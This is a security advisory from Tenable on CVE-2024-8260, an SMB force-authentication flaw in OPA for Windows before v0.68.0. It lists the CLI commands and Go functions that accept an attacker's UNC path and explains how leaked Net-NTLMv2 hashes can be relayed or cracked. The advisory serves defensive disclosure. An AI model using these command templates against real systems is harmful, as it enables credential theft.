Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

OPA SMB Force-Authentication

Medium

Synopsis

A SMB force-authentication vulnerability exists in all versions of OPA for Windows prior to v0.68.0. The vulnerability exists because of improper input validation, allowing a user to pass an arbitrary SMB share instead of a Rego file as an argument to OPA CLI or to one of the OPA Go library’s functions.

This vulnerability requires one of the following:

  • An initial foothold in the environment or social engineering of a user, leading to the execution of the OPA CLI, passing a UNC to the attacker’s server as a Rego rule or bundle path CLI argument.
    • Affected OPA CLI commands:
      • opa eval -d <malicious_UNC_path>
      • opa eval --bundle <malicious_UNC_path>
      • opa run -s <malicious_UNC_path>
  • Passing a UNC to the attacker’s server as a Rego rule or bundle path argument to a vulnerable function in the OPA Go package. This package is used in various Go-based services that integrate OPA, so those services may also be impacted. The likelihood and ease of exploitation is highly increased if the vulnerable function gets its input from the user or a third party, especially if the affected platform is internet facing.
    • Affected OPA Go package functions:
      • Rego.Load(<malicious_UNC_path>, nil)
      • Rego.LoadBundle(<malicious_UNC_path>)

A successful exploit of this vulnerability can lead to unauthorized access by leaking the Net-NTLMv2 hash of the user currently logged into the Windows device running the OPA application, provided the victim can initiate outbound Server Message Block (SMB) traffic over port 445. Post-exploitation, the attacker can either relay authentication to other systems that support NTLMv2, or perform offline cracking to extract the password.
 

Solution

Upgrade to v0.68.0 or later.

Disclosure Timeline

June 19, 2024 - Vulnerability discovered.
August 6, 2024 - Tenable discloses issue to Styra.
August 6, 2024 - Styra acknowledges report.
August 26, 2024 - Tenable requests status update from Styra.
August 27, 2024 - Styra provides status update and states that a fix is ready to go and will be part of the next OPA release that will be published later this week.
August 29, 2024 - Tenable provides attribution information and CVE identifier and requests exact publication date from Styra.
August 29, 2024 - Styra sends a link to their already published release.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

CVE ID: CVE-2024-8260
Tenable Advisory ID: TRA-2024-36
Credit:
Shelly Raban
CVSSv3 Base / Temporal Score:
6.1 / 5.6
CVSSv3 Vector:
AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L
Affected Products:
OPA CLI for Windows (community edition and Enterprise edition) prior to v0.68.0
OPA Go Package running on Windows systems prior to v0.68.0
Risk Factor:
Medium

Advisory Timeline

August 30, 2024 - Initial release.